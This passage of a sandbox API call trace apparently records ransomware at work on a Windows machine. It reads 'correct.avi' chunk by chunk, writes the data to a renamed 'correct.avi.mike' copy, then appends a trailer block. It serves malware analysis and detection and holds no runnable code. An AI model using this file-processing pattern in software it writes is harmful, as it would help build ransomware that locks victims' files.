lpBuffer=0x2290970*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.685] CloseHandle (hObject=0x264) returned 1 [0044.686] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.686] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.686] GetFileType (hFile=0x264) returned 0x1 [0044.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.686] GetFileType (hFile=0x264) returned 0x1 [0044.686] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x19220 [0044.686] WriteFile (in: hFile=0x264, lpBuffer=0x229aed8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x229aed8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.687] CloseHandle (hObject=0x264) returned 1 [0044.688] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.688] GetFileType (hFile=0x264) returned 0x1 [0044.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.688] GetFileType (hFile=0x264) returned 0x1 [0044.688] SetFilePointer (in: hFile=0x264, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x1b800 [0044.688] ReadFile (in: hFile=0x264, lpBuffer=0x229d928, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x229d928*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.688] CloseHandle (hObject=0x264) returned 1 [0044.689] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.689] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.689] GetFileType (hFile=0x264) returned 0x1 [0044.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.689] GetFileType (hFile=0x264) returned 0x1 [0044.689] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x1ba20 [0044.689] WriteFile (in: hFile=0x264, lpBuffer=0x22a7e90*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22a7e90*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.690] CloseHandle (hObject=0x264) returned 1 [0044.691] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.691] GetFileType (hFile=0x264) returned 0x1 [0044.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.692] GetFileType (hFile=0x264) returned 0x1 [0044.692] SetFilePointer (in: hFile=0x264, lDistanceToMove=122880, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x1e000 [0044.692] ReadFile (in: hFile=0x264, lpBuffer=0x22aa8e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22aa8e0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.692] CloseHandle (hObject=0x264) returned 1 [0044.693] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.693] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.693] GetFileType (hFile=0x264) returned 0x1 [0044.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.693] GetFileType (hFile=0x264) returned 0x1 [0044.693] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x1e220 [0044.693] WriteFile (in: hFile=0x264, lpBuffer=0x22b4e48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22b4e48*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.694] CloseHandle (hObject=0x264) returned 1 [0044.695] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.695] GetFileType (hFile=0x264) returned 0x1 [0044.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.695] GetFileType (hFile=0x264) returned 0x1 [0044.695] SetFilePointer (in: hFile=0x264, lDistanceToMove=133120, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x20800 [0044.695] ReadFile (in: hFile=0x264, lpBuffer=0x22b7898, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22b7898*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.696] CloseHandle (hObject=0x264) returned 1 [0044.697] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.697] GetFileType (hFile=0x264) returned 0x1 [0044.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.697] GetFileType (hFile=0x264) returned 0x1 [0044.697] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x20a20 [0044.697] WriteFile (in: hFile=0x264, lpBuffer=0x22c1e00*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22c1e00*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.698] CloseHandle (hObject=0x264) returned 1 [0044.699] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.700] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.700] GetFileType (hFile=0x264) returned 0x1 [0044.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.700] GetFileType (hFile=0x264) returned 0x1 [0044.700] SetFilePointer (in: hFile=0x264, lDistanceToMove=143360, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x23000 [0044.700] ReadFile (in: hFile=0x264, lpBuffer=0x22c4850, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22c4850*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.701] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.701] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.701] GetFileType (hFile=0x264) returned 0x1 [0044.701] GetFileType (hFile=0x264) returned 0x1 [0044.701] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x23220 [0044.702] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.702] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.702] GetFileType (hFile=0x264) returned 0x1 [0044.702] GetFileType (hFile=0x264) returned 0x1 [0044.702] ReadFile (in: hFile=0x264, lpBuffer=0x22d1808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22d1808*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.703] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.703] GetFileType (hFile=0x264) returned 0x1 [0044.703] GetFileType (hFile=0x264) returned 0x1 [0044.703] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x25a20 [0044.704] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.704] GetFileType (hFile=0x264) returned 0x1 [0044.704] GetFileType (hFile=0x264) returned 0x1 [0044.704] ReadFile (in: hFile=0x264, lpBuffer=0x22de7c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22de7c0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.705] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.705] GetFileType (hFile=0x264) returned 0x1 [0044.705] GetFileType (hFile=0x264) returned 0x1 [0044.705] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x28220 [0044.706] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.706] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.706] GetFileType (hFile=0x264) returned 0x1 [0044.706] GetFileType (hFile=0x264) returned 0x1 [0044.706] ReadFile (in: hFile=0x264, lpBuffer=0x22eb778, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22eb778*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.709] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.709] GetFileType (hFile=0x264) returned 0x1 [0044.709] GetFileType (hFile=0x264) returned 0x1 [0044.709] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2aa20 [0044.709] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.709] GetFileType (hFile=0x264) returned 0x1 [0044.709] GetFileType (hFile=0x264) returned 0x1 [0044.710] ReadFile (in: hFile=0x264, lpBuffer=0x20fe9bc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x20fe9bc*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.711] GetFileType (hFile=0x264) returned 0x1 [0044.711] GetFileType (hFile=0x264) returned 0x1 [0044.711] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2d220 [0044.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.712] GetFileType (hFile=0x264) returned 0x1 [0044.712] GetFileType (hFile=0x264) returned 0x1 [0044.712] ReadFile (in: hFile=0x264, lpBuffer=0x210b974, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x210b974*, lpNumberOfBytesRead=0x2af080*=0xa00, lpOverlapped=0x0) returned 1 [0044.713] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.713] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.713] GetFileType (hFile=0x264) returned 0x1 [0044.713] GetFileType (hFile=0x264) returned 0x1 [0044.713] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2fa20 [0044.713] WriteFile (in: hFile=0x264, lpBuffer=0x2111014*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2111014*, lpNumberOfBytesWritten=0x2af074*=0xa00, lpOverlapped=0x0) returned 1 [0044.713] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.713] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.713] GetFileType (hFile=0x264) returned 0x1 [0044.713] GetFileType (hFile=0x264) returned 0x1 [0044.714] WriteFile (in: hFile=0x264, lpBuffer=0x2114238*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2114238*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0044.714] CloseHandle (hObject=0x264) returned 1 [0044.716] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.716] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.716] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c195a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4c195a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4dbc4c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x30420)) returned 1 [0044.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.717] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2115964 | out: lpFileInformation=0x2115964*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c195a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4c195a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4dbc4c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x30420)) returned 1 [0044.717] SetThreadErrorMode (dwNewMode=0x0, 